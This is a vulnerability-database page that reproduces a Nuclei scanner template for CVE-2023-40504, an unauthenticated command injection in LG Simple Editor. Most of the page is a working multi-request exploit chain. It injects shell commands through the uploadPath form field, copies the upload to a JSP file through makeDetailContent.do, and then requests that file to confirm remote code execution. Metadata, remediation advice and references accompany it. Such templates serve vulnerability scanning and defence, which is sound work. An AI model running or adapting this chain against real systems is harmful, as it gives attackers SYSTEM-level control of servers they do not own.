Lucene search
K

LG Simple Editor <= v3.21.0 - Command Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

LG Simple Editor v3.21.0 Command Injection Vulnerability

Related
Refs
Code
id: CVE-2023-40504
info:
  name: LG Simple Editor <= v3.21.0 - Command Injection
  author: s4e-io
  severity: critical
  description: |
    LG Simple Editor readVideoInfo Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of LG Simple Editor. Authentication is not required to exploit this vulnerability. The specific flaw exists within the readVideoInfo method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.
  impact: |
    Unauthenticated attackers can execute arbitrary commands with SYSTEM privileges through the readVideoInfo method by injecting malicious strings in system calls, potentially compromising the entire LG Simple Editor server and connected systems.
  remediation: |
    Update LG Simple Editor to a version newer than 3.21.0 that properly validates user input and prevents command injection in the readVideoInfo method.
  reference:
    - https://www.zerodayinitiative.com/advisories/ZDI-23-1208/
    - https://packetstormsecurity.com/files/180171/LG-Simple-Editor-3.21.0-Command-Injection.html
    - https://0day.today/exploit/39719
    - https://www.usom.gov.tr/bildirim/tr-24-0417
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40504
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-40504
    cwe-id: CWE-78
    epss-score: 0.87761
    epss-percentile: 0.99741
  metadata:
    max-request: 1
    verified: true
    vendor: lg
    product: simple_editor
    fofa-query: icon_hash="159985907"
  tags: cve,cve2023,lg,simple-editor,intrusive,rce,file-upload,vuln

variables:
  filename: "{{rand_base(12)}}"

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"LG Simple Editor")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="uploadVideo"; filename="{{filename}}.bmp"

        /
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="uploadPath"

        /"&cmd&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del {{filename}}.bmp&/../"
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="uploadFile_x"

        1
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="uploadFile_width"

        1
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="uploadFile_height"

        1
        ------WebKitFormBoundary7MA4YWxkTrZu0gW--

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "errorCode","errorMessage","fail")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /simpleeditor/fileSystem/makeDetailContent.do HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: application/json

        {"command":"cp","option":"-f","srcPath":"/{{filename}}_original.bmp","destPath":"/{{filename}}.jsp"}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "errorCode","errorMessage","data","success")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /simpleeditor/{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022047ce227c4696ad58ea46ad60aad4393085725c980d3f0e08beaaf153bea36797022100d78c6a5b72d90b444af1e95776bdff1549f59942fd01328589239f4396d741ce:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.19.8
CVSS 39.8
EPSS0.87761
SSVC
28